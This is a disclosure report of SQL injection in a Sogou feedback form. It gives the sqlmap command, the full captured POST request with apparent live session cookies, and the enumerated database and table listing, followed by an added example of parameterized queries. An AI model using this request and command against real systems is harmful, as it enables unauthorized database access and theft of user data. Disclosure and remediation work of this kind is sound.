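2016-05-15: Details reported to the vendor; awaiting vendor handling
2016-05-16: Vendor confirmed; details disclosed to the vendor only
2016-05-26: Details disclosed to core white hats and experts in related fields
2016-06-05: Details disclosed to regular white hats
2016-06-15: Details disclosed to intern white hats
2016-06-30: Details disclosed to the public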
RT
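http://fankui.help.sogou.com/index.php/web/web/index?type=6
I captured the request and took a look; adding a single quote causes an error. It is impossible to guard against everything.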
sqlmap syntax: sqlmap.py -r 1.txt --dbs

---------------- Request packet -------
POST /index.php/web/web/addShenSu HTTP/1.1
Host: fankui.help.sogou.com
Proxy-Connection: keep-alive
Content-Length: 120
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48C4D629; SUID=0E1649DE2208990A000000005734A933; m=45390C4EEF5AF7959CC32A4FFB401114; GOTO=Af99046; ld=Hkllllllll2g2sZqlllllVtL@xUlllllT66QhZllll9lllllRklll5@@@@@@@@@@; YYID=45390C4EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260

Shensu%5BwebAdr%5D=http%3A%2F%2Fwww.sogou.com%2F&Shensu%5Breason%5D=1&Shensu%5Bcontact%5D=313%40q.com&webContactWayType=
Database information

available databases [3]:
[*] information_schema
[*] sogou_zhanzhang
[*] test
Tables in the current database

Database: sogou_zhanzhang
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| deadlink_wap_data             | 15191050 |
| url_submit                    | 547950  |
| url_submit_view               | 547950  |
| website                       | 270697  |
| website_view                  | 270697  |
| `user`                        | 220754  |
| sitemap                       | 175918  |
| sitemap_copy                  | 175417  |
| sitemap_view                  | 168249  |
| site_name                     | 73232   |
| website_precision             | 67856   |
| site_name_view                | 65060   |
| fault_block_log               | 54773   |
| sitemap_wap                   | 52806   |
| fault_block                   | 51056   |
| sitemap_wap_view              | 48773   |
| sitemap_invitation            | 45320   |
| sitemap_invitation_view       | 43771   |
| site_icon                     | 42416   |
| site_icon_view                | 42067   |
| spider_pressure_feedback      | 31070   |
| sitemap_invitation_log        | 28583   |
| site_logo                     | 27750   |
| site_logo_view                | 25608   |
| site_name_log                 | 24155   |
| spider_pressure_feedback_view | 23755   |
| web2wap                       | 20046   |
| web2wap_view                  | 19268   |
| site_logo_log                 | 17607   |
| renzheng_log                  | 16555   |
| supply_fetch                  | 14501   |
| site_icon_log                 | 13925   |
| renzheng                      | 9324    |
| fb_updateshensu               | 5427    |
| fb_shensu                     | 5341    |
| web2wap_log                   | 4917    |
| fb_img                        | 3720    |
| redirection                   | 3696    |
| redirection_view              | 3696    |
| tb_member                     | 3682    |
| feedback                      | 3270    |
| fb_tool                       | 2906    |
| feedback_view                 | 2773    |
| url_shoulu                    | 2577    |
| umis_waitingfavicon_log       | 2568    |
| umis_waitingfavicon           | 2520    |
| site_param                    | 1992    |
| sitemap_blacklist             | 1917    |
| site_param_view               | 1825    |
| website_precision_log         | 1064    |
| user_change_log               | 968     |
| redirection_log               | 561     |
| fb_suggestion                 | 289     |
| fb_jubao                      | 201     |
| fb_record                     | 153     |
| renzheng_set                  | 106     |
| fb_kuaizhao                   | 81      |
| mail_view                     | 78      |
| backend_user                  | 74      |
| website_log                   | 63      |
| product_black_list            | 24      |
| user_invitation               | 19      |
| notice                        | 18      |
| fb_updatetool                 | 14      |
| website_precision_maxid       | 7       |
| columnist                     | 5       |
| partner_white_list            | 5       |
| mail_group                    | 1       |
| site_param_log                | 1       |
+-------------------------------+---------+
Filter the input.
Severity: High
Vulnerability Rank: 10
Confirmation time: 2016-05-16 08:12
Thanks for your support
None yet
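The single-quote error reported above and the remediation, as an added example that is not part of the original report or the vendor's code: the same form fields are written once by string concatenation and once with bound parameters. Assumptions: sqlite3 stands in for the MySQL backend, the `appeal` table and its columns are hypothetical, and the quote is placed in the contact field arbitrarily because the report does not say which parameter is affected.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed request body in the same shape as the report's POST, with a
# single quote (%27) appended to the contact field.
BODY = ("Shensu%5BwebAdr%5D=http%3A%2F%2Fwww.sogou.com%2F&Shensu%5Breason%5D=1"
        "&Shensu%5Bcontact%5D=313%40q.com%27&webContactWayType=")

def parse_shensu(body):
    """Decode the form body and return the Shensu[...] fields as a dict."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k[len("Shensu["):-1]: v[0] for k, v in fields.items()
            if k.startswith("Shensu[") and k.endswith("]")}

def new_db():
    # Hypothetical table; the real schema is not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE appeal (web_adr TEXT, reason INTEGER, contact TEXT)")
    return db

def insert_concatenated(db, f):
    """Vulnerable pattern: request values pasted into the SQL text."""
    sql = ("INSERT INTO appeal VALUES ('%s', %s, '%s')"
           % (f["webAdr"], f["reason"], f["contact"]))
    db.execute(sql)

def insert_parameterized(db, f):
    """Hardened pattern: values are bound and never parsed as SQL."""
    if not f["reason"].isdigit():          # type check on the numeric field
        raise ValueError("reason must be an integer")
    db.execute("INSERT INTO appeal VALUES (?, ?, ?)",
               (f["webAdr"], int(f["reason"]), f["contact"]))

def demo():
    f = parse_shensu(BODY)
    db = new_db()
    try:
        insert_concatenated(db, f)
        concat_error = None
    except sqlite3.OperationalError as exc:
        concat_error = str(exc)            # the quote unbalanced the statement
    insert_parameterized(db, f)
    stored = db.execute("SELECT contact FROM appeal").fetchall()
    return concat_error, stored

if __name__ == "__main__":
    print(demo())
```

With bound parameters the quote is stored as ordinary data, so the fix does not depend on a filter list being complete.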